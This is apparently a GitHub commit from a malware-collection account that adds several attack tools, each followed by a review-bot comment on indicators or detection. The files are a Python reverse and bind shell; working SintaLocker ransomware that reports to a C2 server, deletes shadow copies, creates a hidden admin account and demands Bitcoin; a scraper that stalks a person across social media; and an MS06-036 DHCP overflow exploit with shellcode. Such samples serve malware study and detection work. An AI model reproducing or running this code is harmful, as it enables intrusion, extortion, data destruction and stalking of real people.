Add files via upload

vxunderground
2020-10-09 22:09:52 -05:00
committed by GitHub
parent f5ec68af9b
commit 9cbdb38457
17 changed files with 2998 additions and 0 deletions
Binary file not shown.
BIN
Binary file not shown.
+121
@@ -0,0 +1,121 @@
#!/usr/bin/env python
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
# #
# alpha #
# #
# #
# usage: #
# % ./d00r -b password port #
# % ./d00r -r password port host #
# % nc host port #
# % nc -l -p port (please use netcat) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import os, sys, socket, time
# =================== var =======
MAX_LEN=1024
SHELL="/bin/zsh -c"
TIME_OUT=300 #s
PW=""
PORT=""
HOST=""
# =================== funct =====
# shell - exec command, return stdout, stderr; improvable
def shell(cmd):
sh_out=os.popen(SHELL+" "+cmd).readlines()
nsh_out=""
for i in range(len(sh_out)):
nsh_out+=sh_out[i]
return nsh_out
# action?
def action(conn):
conn.send("\nPass?\n")
try: pw_in=conn.recv(len(PW))
except: print "timeout"
else:
if pw_in == PW:
conn.send("j00 are on air!\n")
while True:
conn.send(">>> ")
try:
pcmd=conn.recv(MAX_LEN)
except:
print "timeout"
return True
else:
#print "pcmd:",pcmd
cmd=""#pcmd
for i in range(len(pcmd)-1):
cmd+=pcmd[i]
if cmd==":dc":
return True
elif cmd==":sd":
return False
else:
if len(cmd)>0:
out=shell(cmd)
conn.send(out)
# =================== main ======
argv=sys.argv
if len(argv)<4:
print "error; help: head -n 16 d00r.py"
sys.exit(1)
elif argv[1]=="-b":
PW=argv[2]
PORT=argv[3]
elif argv[1]=="-r" and len(argv)>4:
PW=argv[2]
PORT=argv[3]
HOST=argv[4]
else: exit(1)
PORT=int(PORT)
print "PW:",PW,"PORT:",PORT,"HOST:",HOST
#sys.argv[0]="d00r"
# exit father proc
if os.fork()!=0:
sys.exit(0)
# associate the socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
if argv[1]=="-b":
sock.bind(('localhost', PORT))
sock.listen(0)
run=True
while run:
if argv[1]=="-r":
try: sock.connect( (HOST, PORT) )
except:
print "host unreachable"
time.sleep(5)
else: run=action(sock)
else:
try: (conn,addr)=sock.accept()
except:
print "timeout"
time.sleep(1)
else: run=action(conn)
# shutdown the sokcet
if argv[1]=="-b": conn.shutdown(2)
else:
try: sock.send("")
except: time.sleep(1)
else: sock.shutdown(2)
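Review bot: The header banner documents usage only; nothing in the file records the observable behaviour a defender needs to recognise this sample. I would add, under the banner, a comment such as `# Observable: forks and exits the parent; child runs "/bin/zsh -c <cmd>" via os.popen for each line received; sends cleartext "Pass?", "j00 are on air!" and ">>> " on the socket`. Those three strings are sent unencrypted by `action()`, so they are usable as network signatures, and a Python process holding a TCP socket while spawning `/bin/zsh -c` children is the host-side signal. The password is compared with a plain `pw_in == PW` and is supplied as `argv[2]`, so process listings and shell history on an affected host are places an investigator can expect to find it.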
+463
@@ -0,0 +1,463 @@
import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2
import SintaRegistery
import SintaChangeWallpaper
from Crypto import Random
from Crypto.Cipher import AES
rmsbrand = 'SintaLocker'
newextns = 'sinta'
encfolder = '__SINTA I LOVE YOU__'
email_con = 'sinpayy@yandex.com'
btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1'
userhome = os.path.expanduser('~')
my_server = 'http://www.dobrebaseny.pl/js/lib/srv/'
wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg'
victim_info = base64.b64encode(str(platform.uname()))
configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname()))
glob_config = None
try:
glob_config = json.loads(urllib.urlopen(configurl).read())
if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']):
raise Exception('0x00001')
except IOError:
time.sleep(1)
victim_id = glob_config[u'MRU_ID']
victim_r = glob_config[u'MRU_UDP']
victim_s = glob_config[u'MRU_PDP']
try:
os.system('bcdedit /set {default} recoveryenabled No')
os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f')
except WindowsError:
pass
def setWallpaper(imageUrl):
try:
wallpaper = SintaChangeWallpaper.ChangeWallpaper()
wallpaper.downloadWallpaper(imageUrl)
except:
pass
def persistance():
try:
SintaRegistery.addRegistery(os.path.realpath(__file__))
except:
pass
def destroy_shadow_copy():
try:
os.system('vssadmin Delete Shadows /All /Quiet')
except:
pass
def create_remote_desktop():
try:
os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f')
os.system('net user ' + victim_r + ' ' + victim_s + ' /add')
os.system('net localgroup administrators ' + victim_r + ' /add')
except:
pass
def write_instruction(dir, ext):
try:
files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w')
files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '')
except:
pass
def delete_file(filename):
try:
os.remove(filename)
except:
pass
def find_files(root_dir):
write_instruction(root_dir, 'md')
extentions = ['*.txt',
'*.exe',
'*.php',
'*.pl',
'*.7z',
'*.rar',
'*.m4a',
'*.wma',
'*.avi',
'*.wmv',
'*.csv',
'*.d3dbsp',
'*.sc2save',
'*.sie',
'*.sum',
'*.ibank',
'*.t13',
'*.t12',
'*.qdf',
'*.gdb',
'*.tax',
'*.pkpass',
'*.bc6',
'*.bc7',
'*.bkp',
'*.qic',
'*.bkf',
'*.sidn',
'*.sidd',
'*.mddata',
'*.itl',
'*.itdb',
'*.icxs',
'*.hvpl',
'*.hplg',
'*.hkdb',
'*.mdbackup',
'*.syncdb',
'*.gho',
'*.cas',
'*.svg',
'*.map',
'*.wmo',
'*.itm',
'*.sb',
'*.fos',
'*.mcgame',
'*.vdf',
'*.ztmp',
'*.sis',
'*.sid',
'*.ncf',
'*.menu',
'*.layout',
'*.dmp',
'*.blob',
'*.esm',
'*.001',
'*.vtf',
'*.dazip',
'*.fpk',
'*.mlx',
'*.kf',
'*.iwd',
'*.vpk',
'*.tor',
'*.psk',
'*.rim',
'*.w3x',
'*.fsh',
'*.ntl',
'*.arch00',
'*.lvl',
'*.snx',
'*.cfr',
'*.ff',
'*.vpp_pc',
'*.lrf',
'*.m2',
'*.mcmeta',
'*.vfs0',
'*.mpqge',
'*.kdb',
'*.db0',
'*.mp3',
'*.upx',
'*.rofl',
'*.hkx',
'*.bar',
'*.upk',
'*.das',
'*.iwi',
'*.litemod',
'*.asset',
'*.forge',
'*.ltx',
'*.bsa',
'*.apk',
'*.re4',
'*.sav',
'*.lbf',
'*.slm',
'*.bik',
'*.epk',
'*.rgss3a',
'*.pak',
'*.big',
'*.unity3d',
'*.wotreplay',
'*.xxx',
'*.desc',
'*.py',
'*.m3u',
'*.flv',
'*.js',
'*.css',
'*.rb',
'*.png',
'*.jpeg',
'*.p7c',
'*.p7b',
'*.p12',
'*.pfx',
'*.pem',
'*.crt',
'*.cer',
'*.der',
'*.x3f',
'*.srw',
'*.pef',
'*.ptx',
'*.r3d',
'*.rw2',
'*.rwl',
'*.raw',
'*.raf',
'*.orf',
'*.nrw',
'*.mrwref',
'*.mef',
'*.erf',
'*.kdc',
'*.dcr',
'*.cr2',
'*.crw',
'*.bay',
'*.sr2',
'*.srf',
'*.arw',
'*.3fr',
'*.dng',
'*.jpeg',
'*.jpg',
'*.cdr',
'*.indd',
'*.ai',
'*.eps',
'*.pdf',
'*.pdd',
'*.psd',
'*.dbfv',
'*.mdf',
'*.wb2',
'*.rtf',
'*.wpd',
'*.dxg',
'*.xf',
'*.dwg',
'*.pst',
'*.accdb',
'*.mdb',
'*.pptm',
'*.pptx',
'*.ppt',
'*.xlk',
'*.xlsb',
'*.xlsm',
'*.xlsx',
'*.xls',
'*.wps',
'*.docm',
'*.docx',
'*.doc',
'*.odb',
'*.odc',
'*.odm',
'*.odp',
'*.ods',
'*.odt',
'*.sql',
'*.zip',
'*.tar',
'*.tar.gz',
'*.tgz',
'*.biz',
'*.ocx',
'*.html',
'*.htm',
'*.3gp',
'*.srt',
'*.cpp',
'*.mid',
'*.mkv',
'*.mov',
'*.asf',
'*.mpeg',
'*.vob',
'*.mpg',
'*.fla',
'*.swf',
'*.wav',
'*.qcow2',
'*.vdi',
'*.vmdk',
'*.vmx',
'*.gpg',
'*.aes',
'*.ARC',
'*.PAQ',
'*.tar.bz2',
'*.tbk',
'*.bak',
'*.djv',
'*.djvu',
'*.bmp',
'*.cgm',
'*.tif',
'*.tiff',
'*.NEF',
'*.cmd',
'*.class',
'*.jar',
'*.java',
'*.asp',
'*.brd',
'*.sch',
'*.dch',
'*.dip',
'*.vbs',
'*.asm',
'*.pas',
'*.ldf',
'*.ibd',
'*.MYI',
'*.MYD',
'*.frm',
'*.dbf',
'*.SQLITEDB',
'*.SQLITE3',
'*.asc',
'*.lay6',
'*.lay',
'*.ms11 (Security copy)',
'*.sldm',
'*.sldx',
'*.ppsm',
'*.ppsx',
'*.ppam',
'*.docb',
'*.mml',
'*.sxm',
'*.otg',
'*.slk',
'*.xlw',
'*.xlt',
'*.xlm',
'*.xlc',
'*.dif',
'*.stc',
'*.sxc',
'*.ots',
'*.ods',
'*.hwp',
'*.dotm',
'*.dotx',
'*.docm',
'*.DOT',
'*.max',
'*.xml',
'*.uot',
'*.stw',
'*.sxw',
'*.ott',
'*.csr',
'*.key',
'wallet.dat']
for dirpath, dirs, files in os.walk(root_dir):
if 'Windows' not in dirpath:
for basename in files:
for ext in extentions:
if fnmatch.fnmatch(basename, ext):
filename = os.path.join(dirpath, basename)
yield filename
def make_directory(file_path):
directory = file_path + '' + encfolder
if not os.path.exists(directory):
try:
os.makedirs(directory)
except:
pass
def text_generator(size = 6, chars = string.ascii_uppercase + string.digits):
return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns
def generate_file(file_path, filename):
make_directory(file_path)
key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ])
newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm')
try:
encrypt_file(key, filename, newfilename)
except:
pass
def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16):
if not out_filename:
out_filename = newfilename
iv = ''.join((chr(random.randint(0, 255)) for i in range(16)))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
listdir = (userhome + '\\Contacts\\',
userhome + '\\Documents\\',
userhome + '\\Downloads\\',
userhome + '\\Favorites\\',
userhome + '\\Links\\',
userhome + '\\My Documents\\',
userhome + '\\My Music\\',
userhome + '\\My Pictures\\',
userhome + '\\My Videos\\',
'D:\\',
'E:\\',
'F:\\',
'G:\\',
'I:\\',
'J:\\',
'K:\\',
'L:\\',
'M:\\',
'N:\\',
'O:\\',
'P:\\',
'Q:\\',
'R:\\',
'S:\\',
'T:\\',
'U:\\',
'V:\\',
'W:\\',
'X:\\',
'Y:\\',
'Z:\\')
for dir_ in listdir:
for filename in find_files(dir_):
generate_file(dir_, filename)
delete_file(filename)
persistance()
destroy_shadow_copy()
create_remote_desktop()
write_instruction(userhome + '\\Desktop\\', 'txt')
os.startfile(userhome + '\\Desktop\\README_FOR_DECRYPT.txt')
setWallpaper(wallpaper_link)
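Review bot: The module-level constants at the top of this file are its indicators of compromise, yet nothing marks them as such or lists the host changes made further down. I would add a header comment along the lines of `# IoCs: C2 in my_server, contact in email_con, wallet in btc_address; files renamed to *.sinta under '__SINTA I LOVE YOU__'; ransom note README_FOR_DECRYPT.md/.txt`. Host-side detections follow directly from the `os.system` calls: `bcdedit` turning off recovery, `vssadmin Delete Shadows /All /Quiet`, `REG ADD` of `DisableTaskMgr`/`DisableRegistryTools`/`DisableCMD`/`NoRun`, `fDenyTSConnections` set to 0, and `net user ... /add` followed by `net localgroup administrators`. In the visible lines the per-file key created in `generate_file` is handed to `encrypt_file` and is not written or sent anywhere, so recovery planning should rest on offline backups rather than on the existence of a decryptor.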
+336
@@ -0,0 +1,336 @@
import os
import requests
import sys
import subprocess
import re
import face_recognition
import json
done_checks = []
social_media = []
usernames = []
emails = []
twitter = []
instagram = []
steam = []
urls = []
urls_stalk = []
urls_done = []
name = ""
adresse = ""
compare = False
first_dl = False
def stalk(user):
if len(user) > 1:
global urls_stalk
pastebin_url = "https://pastebin.com/u/" + user
pastebin_str = "s Pastebin - Pastebin.com"
patreon_url = "https://www.patreon.com/" + user
patreon_str = 'created_at'
gutefrage_url = "https://www.gutefrage.net/nutzer/" + user
gutefrage_str = '<meta name="title" content="Profil von'
ebay_url = "https://www.ebay.de/usr/" + user
ebay_str = '<span>Angemeldet seit: </span>'
twitter_url = "https://twitter.com/" + user
twitter_str = '<link rel="canonical" href="https://twitter.com/' + user + '">'
facebook_url = 'https://facebook.com/' + user
facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user
instagram_url = "https://www.instagram.com/" + user + "/"
instagram_str = '<link rel="alternate" href="https://www.instagram.com/' + user + '/?hl=en" hreflang="en" />'
steam_url = "https://steamcommunity.com/id/" + user
steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif'
twitch_url = "https://www.twitch.tv/" + user
twitch_str = "content='twitch://stream/" + user
lachschon_url = "https://www.lachschon.de/community/user/" + user + "/"
lachschon_str = '<label>Rang</label>'
URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url]
STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str]
for i in range(0, len(URLS)):
html = getResponse(URLS[i])
if STRS[i].lower() in str(html).lower():
print("\t> " + URLS[i])
urls_stalk.append(URLS[i])
def get_twitter_img(user):
url = "https://twitter.com/" + user
html = subprocess.getoutput("phantomjs html.js " + url)
image = find_between(html, '<img class="ProfileAvatar-image " src="', '" alt="')
r = requests.get(image)
with open('Twitter.jpg', 'wb') as f:
f.write(r.content)
def get_instagram_img(user):
data = {
'username': user,
'submit': 'View DP'
}
response = requests.post('https://fullinstadp.com/index.php', data=data)
html = response.text
f = open("Out.html", "w")
f.write(html)
f.close
img_url = find_between(html, '<img class="loading img-rounded center-block img-responsive" src="', '" alt=""')
r = requests.get(img_url)
with open('Instagram.jpg', 'wb') as f:
f.write(r.content)
def check_mail(string):
EMAIL_REGEX = re.compile(r"[^@]+@[^@]+\.[^@]+")
if EMAIL_REGEX.match(string):
return True
else:
return False
def check_string_mail(string):
global emails
splitted = string.split(" ")
for word in splitted:
if check_mail(word):
emails.append(word)
def check_string_url(string):
global urls
for word in string.split(" "):
try:
url = re.search("(?P<url>https?://[^\s]+)", word).group("url")
if '//t.co/' in url:
last = url[-1:]
if last == ".":
url = url.rstrip('.')
r = requests.get(url)
url = r.url
urls.append(url)
except:
e = ""
def check_string_socialmedia(string):
global social_media
count = 0
next = 0
for word in string.split(" "):
next = count + 2
if 'facebook' in word.lower():
print(string.split(" ")[next])
count +=1
def youtube(url):
url = url + "/about"
html = subprocess.getoutput("phantomjs html.js " + url)
tmp_str = html.split('"}},"urlEndpoint":')
for url in tmp_str:
#print(url)
url = find_between(url, '{"url":"', '","target":')
print(html)
def grab_instagram(profile):
global done_checks
global urls
global instagram
global usernames
global compare
if not "instagram: " + profile in done_checks:
if not profile in usernames:
usernames.append(profile)
url = "https://www.instagram.com/" + profile + "/"
html = subprocess.getoutput("phantomjs html.js " + url)
if '"@type":"Person","name":"' in html:
display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"')
if not display_name in usernames:
usernames.append(display_name)
if not "instagram: " + display_name in done_checks:
print(display_name)
stalk(display_name)
instagram.append("Display Name: " + display_name)
description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer')
follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer')
check_string_mail(description)
check_string_url(description)
instagram.append("Description: " + description)
instagram.append("Follower: " + follower)
#get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion
compare = True
if not "instagram: " + profile in done_checks:
done_checks.append("instagram: " + profile)
def grab_steam(url):
global done_checks
global urls
global usernames
if not "steam: " + profile in done_checks:
url = url + "/ajaxaliases/"
response = requests.get(url)
html = response.text
for item in html.split("newname"):
username = find_between(item, '":"', '","timechanged')
if not username in usernames:
usernames.append(username)
def grab_twitter(profile):
global done_checks
global urls
global adresse
global usernames
global twitter
global first_dl
if not "twitter: " + profile in done_checks:
url = "https://twitter.com/" + profile
urls.append(url)
html = subprocess.getoutput("phantomjs html.js " + url)
#variables
display_name = find_between(html, '<title>', ' (@')
if not profile in usernames:
usernames.append(profile)
if not display_name in usernames:
usernames.append(display_name)
if not "twitter: " + display_name in done_checks:
print(display_name)
stalk(display_name)
join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten')
description = ""
url = ""
location = ""
#if
if '<meta name="description"' in html:
description = find_between(html, '<meta name="description" content="', '">')
description = description.replace("&quot", "")
check_string_mail(description)
check_string_url(description)
if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html:
tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>')
url = find_between(tmp, '" title="', '">')
urls.append(url)
if 'location&quot;:&quot;' in html:
location = find_between(html, '&quot;location&quot;:&quot;', '&quot;,&quot;url')
if len(location) > 0:
adresse = location
twitter.append("Display Name: " + display_name)
twitter.append("Join Date: " + join_date)
twitter.append("Description: " + description)
twitter.append("URL: " + url)
twitter.append("Location: " + location)
twitter.append(" ")
#if first_dl == False:
#get_twitter_img(profile)
#first_dl = True
if not "twitter: " + profile in done_checks:
done_checks.append("twitter: " + profile)
def handle():
try:
if sys.argv[1]:
social_media = sys.argv[1].lower()
if sys.argv[2]:
info_type = sys.argv[2].lower()
if sys.argv[3]:
infos = sys.argv[3].lower()
if info_type == "url":
if social_media == "youtube":
youtube(infos)
elif info_type == "profile":
if social_media == "twitter":
grab_twitter(infos)
elif info_type == "user":
if social_media == "stalk":
stalk(infos)
except Exception as e:
print(e)
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def getResponse(url):
response = requests.get(url)
#response.raise_for_status()
data = response.content
return data
handle()
for url in urls_stalk:
#print(url)
if 'twitter.com' in url:
checked = False
profile = url.split("/")[3]
for check in done_checks:
if check == "twitter: " + profile:
checked = True
if not checked:
grab_twitter(profile)
done_checks.append("twitter:" + profile)
if 'instagram.com' in url:
checked = False
profile = url.split("/")[3]
for check in done_checks:
if check == "instagram: " + profile:
checked = True
if not checked:
grab_instagram(profile)
#print("Download Profile Picture")
done_checks.append("instagram: " + profile)
#Steam Check direkt in der Stalk Funktion
if 'steamcommunity.com' in url:
checked = False
profile = url.split("/")[4]
for check in done_checks:
if check == "steam: " + profile:
checked = True
if not checked:
grab_steam(url)
done_checks.append("steam: " + profile)
print("------------------")
print("Usernames:")
print("------------------")
for user in usernames:
print(user)
stalk(user)
if len(urls) > 0:
print("------------------")
print("URLs:")
print("------------------")
for url in urls:
print(url)
if len(twitter) > 0:
print("------------------")
print("Twitter:")
print("------------------")
for item in twitter:
print(item)
if len(instagram) > 0:
print("------------------")
print("Instagram:")
print("------------------")
for item in instagram:
print(item)
if len(steam) > 0:
print("------------------")
print("Steam:")
print("------------------")
for item in steam:
print(item)
print("------------------")
print("Sites checked:")
print("------------------")
for check in done_checks:
print(check)
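Review bot: `get_twitter_img`, `youtube`, `grab_instagram` and `grab_twitter` each build a shell command by concatenation, `subprocess.getoutput("phantomjs html.js " + url)`, and `url` carries text from `sys.argv` or from scraped pages (display names passed to `stalk()` end up in `urls_stalk` and are split back into `profile`). `getoutput` hands the string to the shell, so any shell metacharacter in that remote-controlled text is interpreted as a command on the machine running the script. Pass an argument list instead, for example `html = subprocess.run(["phantomjs", "html.js", url], capture_output=True, text=True).stdout`, and apply the same change at all four call sites.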
+237
@@ -0,0 +1,237 @@
#!/usr/bin/env python
#
#
# by redsand@blacksecurity.org
# this (like any thing) would not be possible w/out the bl4ck team.
# thanks guys.
#
import sys, os
sys.path.append("pydhcplib")
from scapy import *
from pydhcplib.dhcp_packet import *
from pydhcplib.dhcp_network import *
from pydhcplib.type_strlist import *
from pydhcplib.type_ipv4 import *
from pydhcplib.type_hw_addr import *
inet_face = "vmnet8"
default_ip = "10.31.33.7"
# user bl4ck/bl4ck
# this exits via Thread (so thta we kill the dhcp thread in services.exe
#
# this means if services doesn't crash, it was a successful exploit
#
scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \
"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \
"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \
"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \
"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \
"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \
"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \
"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \
"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \
"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \
"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \
"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \
"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \
"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \
"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5"
netopt = {'client_listen_port':"68",
'server_listen_port':"67",
'listen_address':"0.0.0.0"}
def substr(i,o,off):
begin=i[:off]
end=i[off+len(o):]
ret=begin+o+end
return ret
def io(i):
str=""
a=chr(i % 256)
i=i >> 8
b=chr(i % 256)
i=i >> 8
c=chr(i % 256)
i=i >> 8
d=chr(i % 256)
str+="%c%c%c%c" % (a,b,c,d)
return str
class Server(DhcpServer):
def __init__(self, options):
DhcpServer.__init__(self,options["listen_address"],
options["client_listen_port"],
options["server_listen_port"])
def HandleDhcpDiscover(self, packet):
my_reqip = ''
my_reqip = default_ip
sid_i = my_reqip.rfind(".")
server_ip = my_reqip[0:sid_i] + ".254"
our_ip = my_reqip[0:sid_i] + ".2"
mymac = hwmac(packet.GetHardwareAddress()).str()
print "** Received discover from %s (%s)" % (mymac,my_reqip)
mpacket = DhcpPacket()
mpacket.CreateDhcpOfferPacketFrom(packet)
mpacket.SetOption("dhcp_message_type",[2])
mpacket.SetOption("yiaddr", ipv4(my_reqip).list())
mpacket.SetOption("siaddr", ipv4(server_ip).list())
mpacket.SetOption("ip_address_lease_time",[0,0,7,8])
mpacket.SetOption("flags",[0,0])
mpacket.SetOption("server_identifier", ipv4(server_ip).list())
mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list())
mpacket.SetOption("domain_name_server", ipv4(our_ip).list())
mpacket.SetOption("router",ipv4(our_ip).list())
mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list())
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('')
print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip)
sendp(p, iface=inet_face, verbose=False)
def HandleDhcpRequest(self, packet):
ip = packet.GetOption("request_ip_address")
sid = packet.GetOption("server_identifier")
ciaddr = packet.GetOption("ciaddr")
my_reqip = ''
try:
data = packet.options_data['request_ip_address']
for i in range(0,len(data),4) :
if len(data[i:i+4]) == 4 :
my_reqip += ipv4(data[i:i+4]).str()
except:
my_reqip = default_ip
mymac = hwmac(packet.GetHardwareAddress()).str()
print "** Received request from %s (%s)" % (my_reqip,mymac)
sid_i = my_reqip.rfind(".")
server_ip = my_reqip[0:sid_i] + ".254"
our_ip = my_reqip[0:sid_i] + ".2"
mypacket = DhcpPacket()
mypacket.CreateDhcpAckPacketFrom(packet)
mypacket.SetOption("yiaddr", ipv4(my_reqip).list())
dumbstr = "\x90" * 0xFF
# we're looking for a jmp/call ebx ?! or landing in our codespace
# directly
# C5 converts to 253C
# BB = 2557
# AA = 00AC
# DD = 258C
# EE = 03B5
# 88 = 00D6
# 99 = 00EA
# F3 = 2591
# B0 = 2264
# 8F = 00c5
eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64"
#eipstr = "C" * 0xFF
payload = "\x42" * 0xFF
payload = substr(payload, scode, 1)
## find location in heap to ret2
# find offset & append as many "\x26\x6e\x43\x6e"
# to increment ebx to a non trashed location (since ebx points to our code)
# then push ebx \x53 and \xc4 (retn)
#
# we're looking for a pop+pop+ret or a jmp/call ebx to return to our
# unicode filtered input
# note it must be iwthin the bounds of 0x0000**** - 0x0070****
# or 0x22***** <-- wont help us
append = "\x0f\xff" + ( "\x90" * 0xff )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( eipstr )
append += "\xfa\xff" + ( eipstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( payload[0:254]) + "\x00"
print "Length of our attack: %r" % len(append)
eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face))
p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024)
print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip)
for i in p:
sendp(eth/i, iface=inet_face, verbose=False)
def HandleDhcpDecline(self, packet):
return
#print "** Dhcp Declined"
#packet.PrintHeaders()
#packet.PrintOptions()
def HandleDhcpRelease(self, packet):
return
#packet.PrintHeaders()
#packet.PrintOptions()
def HandleDhcpInform(self, packet):
return
#packet.PrintHeaders()
#packet.PrintOptions()
print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow"
print "\t by redsand@blacksecurity.org"
print "Usage: %s [interface] [forced request ip]" % sys.argv[0]
print ""
if len(sys.argv) > 1:
inet_face = sys.argv[1]
if len(sys.argv) > 2:
default_ip = sys.argv[2]
print "Listening for client requests:\n"
print "Listening on interface: %s" % inet_face
print "Using default address: %s" % default_ip
server = Server(netopt)
while True :
server.GetNextDhcpPacket()
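Review bot: The bulletin is named only in a runtime banner (`MS06-036 DHCP Client Domain Name Overflow`), and the file carries no comment telling a defender what the traffic looks like or how it is stopped. I would add a header comment such as `# PoC for MS06-036. Fixed by the MS06-036 update; DHCP snooping on access switches drops server replies from untrusted ports.` On the wire, `HandleDhcpDiscover` answers with an Offer whose `domain_name` option is 255 bytes of `N`, and `HandleDhcpRequest` sends an ACK carrying several kilobytes of appended option data split by `fragment(..., 1024)`. An unexpected DHCP server emitting maximum-length domain-name options or fragmented ACKs is therefore the detection point worth recording in that header.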
+130
